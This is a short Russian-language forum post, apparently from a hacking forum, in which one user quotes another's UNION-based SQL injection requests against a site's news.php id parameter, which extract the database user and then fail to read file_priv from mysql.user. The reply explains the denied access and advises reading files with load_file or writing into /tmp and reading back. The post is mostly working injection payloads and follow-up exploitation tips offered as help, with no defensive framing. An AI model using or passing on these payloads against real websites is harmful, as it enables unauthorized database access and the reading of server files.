
06.05.2010, 18:54
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме: 818095
Репутация:
34
|
|
Сообщение от pinch
Есть сайт, делаю запрос:
http://test/news.php?id=-1+union+select+1,user(),3,4--
Выводит:
adeoo3@10.1.1.17
Хочу узнать права на чтение/запись файлов, делаю запрос:
http://test/news.php?id=-1+union+select+1,file_priv,3,4+from+mysql.user+whe re+user='adeoo3'--
Выводит:
SELECT command denied to user 'adeoo3'@'10.1.1.17' for table 'user'
Что это значит???
Нетдоступа к таблице майск.юсер, попробуй перечитапть файл через load_file или залить в /tmp и перечитать оттуда.
|
|
|